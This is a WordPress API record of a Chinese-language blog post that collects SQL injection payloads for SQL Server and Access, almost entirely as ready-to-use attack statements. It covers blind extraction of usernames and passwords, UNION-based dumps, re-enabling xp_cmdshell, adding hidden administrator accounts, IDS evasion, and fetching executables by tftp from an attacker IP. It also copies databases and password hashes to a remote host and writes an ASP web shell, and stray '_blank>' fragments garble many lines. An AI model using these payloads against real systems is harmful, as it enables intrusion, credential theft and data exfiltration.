{"id":1687,"date":"2024-05-08T17:43:38","date_gmt":"2024-05-08T09:43:38","guid":{"rendered":"http:\/\/oneai.eu.org\/?p=1687"},"modified":"2024-05-08T17:43:38","modified_gmt":"2024-05-08T09:43:38","slug":"%e5%b8%b8%e7%94%a8sql%e6%b3%a8%e5%85%a5%e8%af%ad%e5%8f%a5","status":"publish","type":"post","link":"https:\/\/oneai.eu.org\/?p=1687","title":{"rendered":"\u5e38\u7528SQL\u6ce8\u5165\u8bed\u53e5"},"content":{"rendered":"
1.\u5224\u65ad\u6709\u65e0\u6ce8\u5165\u70b9\n; and 1=1 and 1=2\n\n2.\u731c\u8868\u4e00\u822c\u7684\u8868\u7684\u540d\u79f0\u65e0\u975e\u662fadmin adminuser user pass password \u7b49..\nand 0<>(select count(*) from *)\nand 0<>(select count(*) from admin) ---\u5224\u65ad\u662f\u5426\u5b58\u5728admin\u8fd9\u5f20\u8868\n\n3.\u731c\u5e10\u53f7\u6570\u76ee \u5982\u679c\u9047\u52300< \u8fd4\u56de\u6b63\u786e\u9875\u9762 1<\u8fd4\u56de\u9519\u8bef\u9875\u9762\u8bf4\u660e\u5e10\u53f7\u6570\u76ee\u5c31\u662f1\u4e2a\nand 0<(select count(*) from admin)\nand 1<(select count(*) from admin)\n\n4.\u731c\u89e3\u5b57\u6bb5\u540d\u79f0 \u5728len( ) \u62ec\u53f7\u91cc\u9762\u52a0\u4e0a\u6211\u4eec\u60f3\u5230\u7684\u5b57\u6bb5\u540d\u79f0.\nand 1=(select count(*) from admin where len(*)>0)--\nand 1=(select count(*) from admin where len(\u7528\u6237\u5b57\u6bb5\u540d\u79f0name)>0)\nand 1=(select count(*) from admin where len(_blank>\u5bc6\u7801\u5b57\u6bb5\u540d\u79f0password)>0)\n\n5.\u731c\u89e3\u5404\u4e2a\u5b57\u6bb5\u7684\u957f\u5ea6 \u731c\u89e3\u957f\u5ea6\u5c31\u662f\u628a>0\u53d8\u6362 \u76f4\u5230\u8fd4\u56de\u6b63\u786e\u9875\u9762\u4e3a\u6b62\nand 1=(select count(*) from admin where len(*)>0)\nand 1=(select count(*) from admin where len(name)>6) \u9519\u8bef\nand 1=(select count(*) from admin where len(name)>5) \u6b63\u786e \u957f\u5ea6\u662f6\nand 1=(select count(*) from admin where len(name)=6) \u6b63\u786e\n\nand 1=(select count(*) from admin where len(password)>11) \u6b63\u786e\nand 1=(select count(*) from admin where len(password)>12) \u9519\u8bef \u957f\u5ea6\u662f12\nand 1=(select count(*) from admin where len(password)=12) \u6b63\u786e\n\n6.\u731c\u89e3\u5b57\u7b26\nand 1=(select count(*) from admin where left(name,1)=a) ---\u731c\u89e3\u7528\u6237\u5e10\u53f7\u7684\u7b2c\u4e00\u4f4d\nand 1=(select count(*) from admin where left(name,2)=ab)---\u731c\u89e3\u7528\u6237\u5e10\u53f7\u7684\u7b2c\u4e8c\u4f4d\n\u5c31\u8fd9\u6837\u4e00\u6b21\u52a0\u4e00\u4e2a\u5b57\u7b26\u8fd9\u6837\u731c,\u731c\u5230\u591f\u4f60\u521a\u624d\u731c\u51fa\u6765\u7684\u591a\u5c11\u4f4d\u4e86\u5c31\u5bf9\u4e86,\u5e10\u53f7\u5c31\u7b97\u51fa\u6765\u4e86\nand 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --\n\u8fd9\u4e2a\u67e5\u8be2\u8bed\u53e5\u53ef\u4ee5\u731c\u89e3\u4e2d\u6587\u7684\u7528\u6237\u548c_blank>\u5bc6\u7801.\u53ea\u8981\u628a\u540e\u9762\u7684\u6570\u5b57\u6362\u6210\u4e2d\u6587\u7684 ASSIC\u7801\u5c31OK.\u6700\u540e\u628a\u7ed3\u679c\u518d\u8f6c\u6362\u6210\u5b57\u7b26.\n\ngroup by users.id having 1=1--\ngroup by users.id, users.username, users.password, users.privs having 1=1--\n; insert into users values( 666, attacker, foobar, 0xffff )--\n\nUNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable-\nUNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable Where COLUMN_blank>_NAME NOT IN (login_blank>_id)-\nUNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable Where COLUMN_blank>_NAME NOT IN (login_blank>_id,login_blank>_name)-\nUNION Select TOP 1 login_blank>_name FROM logintable-\nUNION Select TOP 1 password FROM logintable where login_blank>_name=Rahul--\n\n\u770b_blank>\u670d\u52a1\u5668\u6253\u7684\u8865\u4e01=\u51fa\u9519\u4e86\u6253\u4e86SP4\u8865\u4e01\nand 1=(select @@VERSION)--\n\n\u770b_blank>\u6570\u636e\u5e93\u8fde\u63a5\u8d26\u53f7\u7684\u6743\u9650\uff0c\u8fd4\u56de\u6b63\u5e38\uff0c\u8bc1\u660e\u662f _blank>\u670d\u52a1\u5668\u89d2\u8272sysadmin\u6743\u9650\u3002\nand 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin))--\n\n\u5224\u65ad\u8fde\u63a5_blank>\u6570\u636e\u5e93\u5e10\u53f7\u3002\uff08\u91c7\u7528SA\u8d26\u53f7\u8fde\u63a5 \u8fd4\u56de\u6b63\u5e38=\u8bc1\u660e\u4e86\u8fde\u63a5\u8d26\u53f7\u662fSA\uff09\nand sa=(Select System_blank>_user)--\nand user_blank>_name()=dbo--\nand 0<>(select user_blank>_name()--\n\n\u770bxp_blank>_cmdshell\u662f\u5426\u5220\u9664\nand 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = X AND name = xp_blank>_cmdshell)--\n\nxp_blank>_cmdshell\u88ab\u5220\u9664\uff0c\u6062\u590d,\u652f\u6301\u7edd\u5bf9\u8def\u5f84\u7684\u6062\u590d\n;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll--\n;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:\\inetpub\\wwwroot\\xplog70.dll--\n\n\u53cd\u5411PING\u81ea\u5df1\u5b9e\u9a8c\n;use master;declare @s int;exec sp_blank>_oacreate "wscript.shell",@s out;exec sp_blank>_oamethod @s,"run",NULL,"cmd.exe \/c ping 192.168.0.1";--\n\n\u52a0\u5e10\u53f7\n;DECLARE @shell INT EXEC SP_blank>_OACreate wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:\\WINNT\\system32\\cmd.exe \/c net user jiaoniang$ 1866574 \/add--\n\n\u521b\u5efa\u4e00\u4e2a\u865a\u62df\u76ee\u5f55E\u76d8\uff1a\n;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c\uff1a\\inetpub\\wwwroot\\mkwebdir.vbs -w "\u9ed8\u8ba4Web\u7ad9\u70b9" -v "e","e\uff1a\\"--\n\n\u8bbf\u95ee\u5c5e\u6027\uff1a\uff08\u914d\u5408\u5199\u5165\u4e00\u4e2awebshell\uff09\ndeclare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c\uff1a\\inetpub\\wwwroot\\chaccess.vbs -a w3svc\/1\/ROOT\/e +browse\n\n\u7206\u5e93 \u7279\u6b8a_blank>\u6280\u5de7\uff1a:%5c=\\ \u6216\u8005\u628a\/\u548c\\ \u4fee\u6539%5\u63d0\u4ea4\nand 0<>(select top 1 paths from newtable)--\n\n\u5f97\u5230\u5e93\u540d\uff08\u4ece1\u52305\u90fd\u662f\u7cfb\u7edf\u7684id\uff0c6\u4ee5\u4e0a\u624d\u53ef\u4ee5\u5224\u65ad\uff09\nand 1=(select name from master.dbo.sysdatabases where dbid=7)--\nand 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)\n\u4f9d\u6b21\u63d0\u4ea4 dbid = 7,8,9.... \u5f97\u5230\u66f4\u591a\u7684_blank>\u6570\u636e\u5e93\u540d\n\nand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) \u66b4\u5230\u4e00\u4e2a\u8868 \u5047\u8bbe\u4e3a admin\nand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) \u6765\u5f97\u5230\u5176\u4ed6\u7684\u8868\u3002\nand 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin\nand uid>(str(id))) \u66b4\u5230UID\u7684\u6570\u503c\u5047\u8bbe\u4e3a18779569 uid=id\nand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) \u5f97\u5230\u4e00\u4e2aadmin\u7684\u4e00\u4e2a\u5b57\u6bb5,\u5047\u8bbe\u4e3a user_blank>_id\nand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in\n(id,...)) \u6765\u66b4\u51fa\u5176\u4ed6\u7684\u5b57\u6bb5\nand 0<(select user_blank>_id from BBS.dbo.admin where username>1) \u53ef\u4ee5\u5f97\u5230\u7528\u6237\u540d\n\u4f9d\u6b21\u53ef\u4ee5\u5f97\u5230_blank>\u5bc6\u7801\u3002\u3002\u3002\u3002\u3002\u5047\u8bbe\u5b58\u5728 user_blank>_id username ,password \u7b49\u5b57\u6bb5\n\nand 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)\nand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) \u5f97\u5230\u8868\u540d\nand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))\nand 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) \u5224\u65adid\u503c\nand 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) \u6240\u6709\u5b57\u6bb5\n\n?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin\n?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union\uff0caccess\u4e5f\u597d\u7528)\n\n\u5f97\u5230WEB\u8def\u5f84\n;create table [dbo].[swap] ([swappass][char](255));--\nand (select top 1 swappass from swap)=1--\n;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE, @key=SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters\\Virtual Roots\\, @value_blank>_name=\/, values=@test OUTPUT insert into paths(path) values(@test)--\n;use ku1;--\n;create table cmd (str image);-- \u5efa\u7acbimage\u7c7b\u578b\u7684\u8868cmd\n\n\u5b58\u5728xp_blank>_cmdshell\u7684\u6d4b\u8bd5\u8fc7\u7a0b\uff1a\n;exec master..xp_blank>_cmdshell dir\n;exec master.dbo.sp_blank>_addlogin jiaoniang$;-- \u52a0SQL\u5e10\u53f7\n;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;--\n;exec master.dbo.sp_blank>_addsrvrolemember jiaoniang$ sysadmin;--\n;exec master.dbo.xp_blank>_cmdshell net user jiaoniang$ 1866574 \/workstations:* \/times:all \/passwordchg:yes \/passwordreq:yes \/active:yes \/add;--\n;exec master.dbo.xp_blank>_cmdshell net localgroup administrators jiaoniang$ \/add;--\nexec master..xp_blank>_servicecontrol start, schedule \u542f\u52a8_blank>\u670d\u52a1\nexec master..xp_blank>_servicecontrol start, server\n; DECLARE @shell INT EXEC SP_blank>_OACreate wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C\uff1a\\WINNT\\system32\\cmd.exe \/c net user jiaoniang$ 1866574 \/add\n;DECLARE @shell INT EXEC SP_blank>_OACreate wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C\uff1a\\WINNT\\system32\\cmd.exe \/c net localgroup administrators jiaoniang$ \/add\n; exec master..xp_blank>_cmdshell tftp -i youip get file.exe-- \u5229\u7528TFTP\u4e0a\u4f20\u6587\u4ef6\n\n;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\\\n;declare @a sysname set @a=xp+_blank>_cm\u2019+\u2019dshell exec @a dir c:\\\n;declare @a;set @a=db_blank>_name();backup database @a to disk=\u4f60\u7684IP\u4f60\u7684\u5171\u4eab\u76ee\u5f55bak.dat\n\u5982\u679c\u88ab\u9650\u5236\u5219\u53ef\u4ee5\u3002\nselect * from openrowset(_blank>sqloledb,server;sa;,select OK! exec master.dbo.sp_blank>_addlogin hax)\n\n\u67e5\u8be2\u6784\u9020\uff1a\nSelect * FROM news Where id=... AND topic=... AND .....\nadminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>\nselect 123;--\n;use master;--\n:a or name like fff%;-- \u663e\u793a\u6709\u4e00\u4e2a\u53ebffff\u7684\u7528\u6237\u54c8\u3002\nand 1<>(select count(email) from [user]);--\n;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--\n;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--\n;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--\n;update [users] set email=(select top 1 count(id) from password) where name=ffff;--\n;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--\n;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--\n\u4e0a\u9762\u7684\u8bed\u53e5\u662f\u5f97\u5230_blank>\u6570\u636e\u5e93\u4e2d\u7684\u7b2c\u4e00\u4e2a\u7528\u6237\u8868,\u5e76\u628a\u8868\u540d\u653e\u5728ffff\u7528\u6237\u7684\u90ae\u7bb1\u5b57\u6bb5\u4e2d\u3002\n\u901a\u8fc7\u67e5\u770bffff\u7684\u7528\u6237\u8d44\u6599\u53ef\u5f97\u7b2c\u4e00\u4e2a\u7528\u8868\u53ebad\n\u7136\u540e\u6839\u636e\u8868\u540d ad\u5f97\u5230\u8fd9\u4e2a\u8868\u7684ID \u5f97\u5230\u7b2c\u4e8c\u4e2a\u8868\u7684\u540d\u5b57\n\ninsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--\ninsert into users values( 667,123,123,0xffff)--\ninsert into users values ( 123, admin--, password, 0xffff)--\n;and user>0\n;and (select count(*) from sysobjects)>0\n;and (select count(*) from mysysobjects)>0 \/\/\u4e3aaccess_blank>\u6570\u636e\u5e93\n\n\u679a\u4e3e\u51fa\u6570\u636e\u8868\u540d\n;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--\n\u8fd9\u662f\u5c06\u7b2c\u4e00\u4e2a\u8868\u540d\u66f4\u65b0\u5230aaa\u7684\u5b57\u6bb5\u5904\u3002\n\u8bfb\u51fa\u7b2c\u4e00\u4e2a\u8868\uff0c\u7b2c\u4e8c\u4e2a\u8868\u53ef\u4ee5\u8fd9\u6837\u8bfb\u51fa\u6765\uff08\u5728\u6761\u4ef6\u540e\u52a0\u4e0a and name<>\u521a\u624d\u5f97\u5230\u7684\u8868\u540d\uff09\u3002\n;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--\n\u7136\u540eid=1552 and exists(select * from aaa where aaa>5)\n\u8bfb\u51fa\u7b2c\u4e8c\u4e2a\u8868\uff0c\u4e00\u4e2a\u4e2a\u7684\u8bfb\u51fa\uff0c\u76f4\u5230\u6ca1\u6709\u4e3a\u6b62\u3002\n\u8bfb\u5b57\u6bb5\u662f\u8fd9\u6837\uff1a\n;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(\u8868\u540d),1));--\n\u7136\u540eid=152 and exists(select * from aaa where aaa>5)\u51fa\u9519\uff0c\u5f97\u5230\u5b57\u6bb5\u540d\n;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(\u8868\u540d),2));--\n\u7136\u540eid=152 and exists(select * from aaa where aaa>5)\u51fa\u9519\uff0c\u5f97\u5230\u5b57\u6bb5\u540d\n\n[\u83b7\u5f97\u6570\u636e\u8868\u540d][\u5c06\u5b57\u6bb5\u503c\u66f4\u65b0\u4e3a\u8868\u540d\uff0c\u518d\u60f3\u6cd5\u8bfb\u51fa\u8fd9\u4e2a\u5b57\u6bb5\u7684\u503c\u5c31\u53ef\u5f97\u5230\u8868\u540d]\nupdate \u8868\u540d set \u5b57\u6bb5=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>\u4f60\u5f97\u5230\u7684\u8868\u540d \u67e5\u51fa\u4e00\u4e2a\u52a0\u4e00\u4e2a]) [ where \u6761\u4ef6] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,\u2026)\n\u901a\u8fc7SQLSERVER\u6ce8\u5165_blank>\u6f0f\u6d1e\u5efa_blank>\u6570\u636e\u5e93\u7ba1\u7406\u5458\u5e10\u53f7\u548c\u7cfb\u7edf\u7ba1\u7406\u5458\u5e10\u53f7[\u5f53\u524d\u5e10\u53f7\u5fc5\u987b\u662fSYSADMIN\u7ec4]\n\n[\u83b7\u5f97\u6570\u636e\u8868\u5b57\u6bb5\u540d][\u5c06\u5b57\u6bb5\u503c\u66f4\u65b0\u4e3a\u5b57\u6bb5\u540d\uff0c\u518d\u60f3\u6cd5\u8bfb\u51fa\u8fd9\u4e2a\u5b57\u6bb5\u7684\u503c\u5c31\u53ef\u5f97\u5230\u5b57\u6bb5\u540d]\nupdate \u8868\u540d set \u5b57\u6bb5=(select top 1 col_blank>_name(object_blank>_id(\u8981\u67e5\u8be2\u7684\u6570\u636e\u8868\u540d),\u5b57\u6bb5\u5217\u5982:1) [ where \u6761\u4ef6]\n\n\u7ed5\u8fc7IDS\u7684\u68c0\u6d4b[\u4f7f\u7528\u53d8\u91cf]\n;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\\\n;declare @a sysname set @a=xp+_blank>_cm\u2019+\u2019dshell exec @a dir c:\\\n\n1\u3001 \u5f00\u542f\u8fdc\u7a0b_blank>\u6570\u636e\u5e93\n\u57fa\u672c\u8bed\u6cd5\nselect * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )\n\u53c2\u6570: (1) OLEDB Provider name\n2\u3001 \u5176\u4e2d\u8fde\u63a5\u5b57\u7b26\u4e32\u53c2\u6570\u53ef\u4ee5\u662f\u4efb\u4f55\u7aef\u53e3\u7528\u6765\u8fde\u63a5,\u6bd4\u5982\nselect * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table\n3.\u590d\u5236\u76ee\u6807\u4e3b\u673a\u7684\u6574\u4e2a_blank>\u6570\u636e\u5e93insert\u6240\u6709\u8fdc\u7a0b\u8868\u5230\u672c\u5730\u8868\u3002\n\n\u57fa\u672c\u8bed\u6cd5\uff1a\ninsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2\n\u8fd9\u884c\u8bed\u53e5\u5c06\u76ee\u6807\u4e3b\u673a\u4e0atable2\u8868\u4e2d\u7684\u6240\u6709\u6570\u636e\u590d\u5236\u5230\u8fdc\u7a0b_blank>\u6570\u636e\u5e93\u4e2d\u7684table1\u8868\u4e2d\u3002\u5b9e\u9645\u8fd0\u7528\u4e2d\u9002\u5f53\u4fee\u6539\u8fde\u63a5\u5b57\u7b26\u4e32\u7684IP\u5730\u5740\u548c\u7aef\u53e3\uff0c\u6307\u5411\u9700\u8981\u7684\u5730\u65b9\uff0c\u6bd4\u5982\uff1a\ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2\ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysdatabases)\nselect * from master.dbo.sysdatabases\ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysobjects)\nselect * from user_blank>_database.dbo.sysobjects\ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_syscolumns)\nselect * from user_blank>_database.dbo.syscolumns\n\u590d\u5236_blank>\u6570\u636e\u5e93\uff1a\ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1\ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2\n\n\u590d\u5236\u54c8\u897f\u8868\uff08HASH\uff09\u767b\u5f55_blank>\u5bc6\u7801\u7684hash\u5b58\u50a8\u4e8esysxlogins\u4e2d\u3002\u65b9\u6cd5\u5982\u4e0b\uff1a\ninsert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _blank>_sysxlogins) select * from database.dbo.sysxlogins\n\u5f97\u5230hash\u4e4b\u540e\uff0c\u5c31\u53ef\u4ee5\u8fdb\u884c\u66b4\u529b\u7834\u89e3\u3002\n\n\u904d\u5386\u76ee\u5f55\u7684\u65b9\u6cd5\uff1a \u5148\u521b\u5efa\u4e00\u4e2a\u4e34\u65f6\u8868\uff1atemp\n;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--\n;insert temp exec master.dbo.xp_blank>_availablemedia;-- \u83b7\u5f97\u5f53\u524d\u6240\u6709\u9a71\u52a8\u5668\n;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:\\;-- \u83b7\u5f97\u5b50\u76ee\u5f55\u5217\u8868\n;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\\;-- \u83b7\u5f97\u6240\u6709\u5b50\u76ee\u5f55\u7684\u76ee\u5f55\u6811\u7ed3\u6784,\u5e76\u5bf8\u5165temp\u8868\u4e2d\n;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:\\web\\index.asp;-- \u67e5\u770b\u67d0\u4e2a\u6587\u4ef6\u7684\u5185\u5bb9\n;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\\;--\n;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\\ *.asp \/s\/a;--\n;insert into temp(id) exec master.dbo.xp_blank>_cmdshell cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs enum w3svc\n;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\\;-- \uff08xp_blank>_dirtree\u9002\u7528\u6743\u9650PUBLIC\uff09\n\u5199\u5165\u8868\uff1a\n\u8bed\u53e51\uff1aand 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin));--\n\u8bed\u53e52\uff1aand 1=(Select IS_blank>_SRVROLEMEMBER(serveradmin));--\n\u8bed\u53e53\uff1aand 1=(Select IS_blank>_SRVROLEMEMBER(setupadmin));--\n\u8bed\u53e54\uff1aand 1=(Select IS_blank>_SRVROLEMEMBER(securityadmin));--\n\u8bed\u53e55\uff1aand 1=(Select IS_blank>_SRVROLEMEMBER(securityadmin));--\n\u8bed\u53e56\uff1aand 1=(Select IS_blank>_SRVROLEMEMBER(diskadmin));--\n\u8bed\u53e57\uff1aand 1=(Select IS_blank>_SRVROLEMEMBER(bulkadmin));--\n\u8bed\u53e58\uff1aand 1=(Select IS_blank>_SRVROLEMEMBER(bulkadmin));--\n\u8bed\u53e59\uff1aand 1=(Select IS_blank>_MEMBER(db_blank>_owner));--\n\n\u628a\u8def\u5f84\u5199\u5230\u8868\u4e2d\u53bb\uff1a\n;create table dirs(paths varchar(100), id int)--\n;insert dirs exec master.dbo.xp_blank>_dirtree c:\\--\nand 0<>(select top 1 paths from dirs)--\nand 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--\n;create table dirs1(paths varchar(100), id int)--\n;insert dirs exec master.dbo.xp_blank>_dirtree e:\\web--\nand 0<>(select top 1 paths from dirs1)--\n\n\u628a_blank>\u6570\u636e\u5e93\u5907\u4efd\u5230\u7f51\u9875\u76ee\u5f55\uff1a\u4e0b\u8f7d\n;declare @a sysname; set @a=db_blank>_name();backup database @a to disk=e:\\web\\down.bak;--\n\nand 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)\nand 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) \u53c2\u770b\u76f8\u5173\u8868\u3002\nand 1=(select user_blank>_id from USER_blank>_LOGIN)\nand 0=(select user from USER_blank>_LOGIN where user>1)\n\n-=- wscript.shell example -=-\ndeclare @o int\nexec sp_blank>_oacreate wscript.shell, @o out\nexec sp_blank>_oamethod @o, run, NULL, notepad.exe\n; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe--\n\ndeclare @o int, @f int, @t int, @ret int\ndeclare @line varchar(8000)\nexec sp_blank>_oacreate scripting.filesystemobject, @o out\nexec sp_blank>_oamethod @o, opentextfile, @f out, c:\\boot.ini, 1\nexec @ret = sp_blank>_oamethod @f, readline, @line out\nwhile( @ret = 0 )\nbegin\nprint @line\nexec @ret = sp_blank>_oamethod @f, readline, @line out\nend\n\ndeclare @o int, @f int, @t int, @ret int\nexec sp_blank>_oacreate scripting.filesystemobject, @o out\nexec sp_blank>_oamethod @o, createtextfile, @f out, c:\\inetpub\\wwwroot\\foo.asp, 1\nexec @ret = sp_blank>_oamethod @f, writeline, NULL,\n<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>\n\ndeclare @o int, @ret int\nexec sp_blank>_oacreate speech.voicetext, @o out\nexec sp_blank>_oamethod @o, register, NULL, foo, bar\nexec sp_blank>_oasetproperty @o, speed, 150\nexec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528\nwaitfor delay 00:00:05\n\n; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--\n\nxp_blank>_dirtree\u9002\u7528\u6743\u9650PUBLIC\nexec master.dbo.xp_blank>_dirtree c:\u8fd4\u56de\u7684\u4fe1\u606f\u6709\u4e24\u4e2a\u5b57\u6bb5subdirectory\u3001depth\u3002Subdirectory\u5b57\u6bb5\u662f\u5b57\u7b26\u578b\uff0cdepth\u5b57\u6bb5\u662f\u6574\u5f62\u5b57\u6bb5\u3002\ncreate table dirs(paths varchar(100), id int)\n\u5efa\u8868\uff0c\u8fd9\u91cc\u5efa\u7684\u8868\u662f\u548c\u4e0a\u9762 xp_blank>_dirtree\u76f8\u5173\u8fde\uff0c\u5b57\u6bb5\u76f8\u7b49\u3001\u7c7b\u578b\u76f8\u540c\u3002\ninsert dirs exec master.dbo.xp_blank>_dirtree c:\u53ea\u8981\u6211\u4eec\u5efa\u8868\u4e0e\u5b58\u50a8\u8fdb\u7a0b\u8fd4\u56de\u7684\u5b57\u6bb5\u76f8\u5b9a\u4e49\u76f8\u7b49\u5c31\u80fd\u591f\u6267\u884c\uff01\u8fbe\u5230\u5199\u8868\u7684\u6548\u679c,\u4e00\u6b65\u6b65\u8fbe\u5230\u6211\u4eec\u60f3\u8981\u7684\u4fe1\u606f\uff01<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
1.\u5224\u65ad\u6709\u65e0\u6ce8\u5165\u70b9 ; and 1=1 and 1=2 2.\u731c\u8868\u4e00\u822c\u7684\u8868\u7684\u540d\u79f0\u65e0\u975e\u662fadmin adminuser user pass password \u7b49.. and 0<>(select count(*) from *) and 0<>(select count(*) from admin) —\u5224\u65ad\u662f\u5426\u5b58\u5728admin\u8fd9\u5f20\u8868 3.\u731c\u5e10\u53f7\u6570\u76ee \u5982\u679c\u9047\u52300< \u8fd4\u56de\u6b63\u786e\u9875\u9762 1<\u8fd4\u56de\u9519\u8bef\u9875\u9762\u8bf4\u660e\u5e10\u53f7\u6570\u76ee\u5c31\u662f1\u4e2a and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.\u731c\u89e3\u5b57\u6bb5\u540d\u79f0 \u5728len( ) \u62ec\u53f7\u91cc\u9762\u52a0\u4e0a\u6211\u4eec\u60f3\u5230\u7684\u5b57\u6bb5\u540d\u79f0. and 1=(select count(*) from admin where len(*)>0)– and 1=(select count(*) from admin where len(\u7528\u6237\u5b57\u6bb5\u540d\u79f0name)>0) and 1=(select count(*) from admin where len(_blank>\u5bc6\u7801\u5b57\u6bb5\u540d\u79f0password)>0) 5.\u731c\u89e3\u5404\u4e2a\u5b57\u6bb5\u7684\u957f\u5ea6 \u731c\u89e3\u957f\u5ea6\u5c31\u662f\u628a>0\u53d8\u6362 \u76f4\u5230\u8fd4\u56de\u6b63\u786e\u9875\u9762\u4e3a\u6b62 and 1=(select count(*) from admin where len(*)>0) and 1=(select count(*) from admin where len(name)>6) \u9519\u8bef and 1=(select count(*) from admin where len(name)>5) \u6b63\u786e \u957f\u5ea6\u662f6 and 1=(select count(*) from admin where len(name)=6) \u6b63\u786e and 1=(select count(*) from admin where len(password)>11) \u6b63\u786e and 1=(select count(*) from admin where len(password)>12) \u9519\u8bef \u957f\u5ea6\u662f12 and 1=(select count(*) from admin where len(password)=12) \u6b63\u786e 6.\u731c\u89e3\u5b57\u7b26 and 1=(select count(*) from admin where left(name,1)=a) —\u731c\u89e3\u7528\u6237\u5e10\u53f7\u7684\u7b2c\u4e00\u4f4d and 1=(select count(*) from admin where 